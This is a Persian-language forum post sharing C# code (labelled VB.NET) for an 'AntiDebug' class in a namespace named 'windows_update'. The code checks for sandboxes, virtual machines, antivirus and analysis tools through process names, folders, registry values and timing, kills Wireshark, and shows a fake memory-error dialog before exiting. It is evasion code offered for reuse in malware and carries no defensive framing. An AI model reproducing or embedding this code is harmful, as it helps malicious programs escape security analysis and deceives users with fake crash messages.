• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 9 رای - 3.11 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: (VB.NET)AntiDebug
حالت موضوعی
#1
کد:
using System;
using System.Diagnostics;
using System.IO;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;

namespace windows_update
{
    internal class AntiDebug
    {
        public static void CheckDebug()
        {
            if (AntiVirtualPC())
                Detected();
            else if (AntiAnubis())
                Detected();
            else if (AntiAnubis2())
                Detected();
            else if (AntiKAV())
                Detected();
            else if (AntiSandboxie())
                Detected();
            else if (AntiEmulator())
                Detected();
            else if (AntiNorman())
                Detected();
            else if (AntiWireShark())
                Detected();
            else if (AntiVirtualBox())
                Detected();
            else if (AntiSunbelt())
                Detected();
        }

        private static void Detected()
        {
            MessageBox.Show(
                "Application Error: The instruction at \"0x78ec83b4\" referenced memory at \"0x00405467\". The memory could not be \"read\".",
                "Critical Error!", MessageBoxButtons.OK, MessageBoxIcon.Error);
            Environment.Exit(0);
        }

        private static bool AntiVirtualBox()
        {
            if (prcIsRunning("VBoxService"))
                return true;
            else
                return false;
        }

        private static bool AntiSunbelt()
        {
            if (Directory.Exists("C:\\analysis"))
                return true;
            else
                return false;
        }

        private static bool AntiWireShark()
        {
            if (prcIsRunning("wireshark.exe"))
            {
                killProcess("wireshark.exe");
                return true;
            }
            else
                return false;
        }

        private static bool AntiNorman()
        {
            if (Environment.UserName == "currentuser")
                return true;
            else
                return false;
        }

        //Credit: ChainCoder
        private static bool AntiEmulator()
        {
            bool functionReturnValue = false;
            long timenow = 0;
            long timeaftersleep = 0;
            //Assign long timenow to get the milliseconds passed before app being suspended.

            //Tickcount before sleep
            timenow = Environment.TickCount;
            //Sleeps half a second
            Thread.Sleep(500);
            //Tickcount after sleep
            timeaftersleep = Environment.TickCount;

            if (timeaftersleep - timenow < 500)
                functionReturnValue = true;
            else
                functionReturnValue = false;

            return functionReturnValue;
        }

        private static bool AntiSandboxie()
        {
            if (Process.GetProcessesByName("SbieSvc").Length >= 1 | Process.GetProcessesByName("sniff_hit").Length >= 1 |
                Process.GetProcessesByName("sysAnalyzer").Length >= 1)
                return true;
            else
                return false;
        }

        private static bool AntiKAV()
        {
            if (Process.GetProcessesByName("avp").Length >= 1)
                return true;
            else
                return false;
        }

        private static bool AntiAnubis()
        {
            string folder = Application.StartupPath;
            string getFile = folder + "\\sample.exe";
            if (Application.ExecutablePath == getFile)
                return true;
            else
                return false;
        }

        private static bool AntiAnubis2()
        {
            //Anubis Info -
            //PRODUCT ID/KEY: 76487-337-8429955-22614
            //MACHINEGUID: e575b6fd-1714-411e-8f6a-4c469796e816

            RegistryKey regPID = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
                                                                  false);
            object pid = regPID.GetValue("ProductId");
            string id = "76487-337-8429955-22614";

            if ((string) pid == id)
                return true;
            else
                return false;
        }

        private static bool AntiVirtualPC()
        {
            if (Process.GetProcessesByName("vpcmap").Length >= 4 & Process.GetProcessesByName("vmsrvc").Length >= 4)
            {
                return true;
            }
            else if (Process.GetProcessesByName("vmusrvc").Length >= 4)
            {
                return true;
            }
            return false;
        }

        public static bool prcIsRunning(string process)
        {
            foreach (Process p in Process.GetProcesses())
                if (p.ProcessName == process)
                    return true;
            return false;
        }

        public static void killProcess(string process)
        {
            foreach (Process p in Process.GetProcesses())
                if (p.ProcessName.Equals(process))
                    p.Kill();
        }
    }
}
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پرش به انجمن:


Browsing: 3 مهمان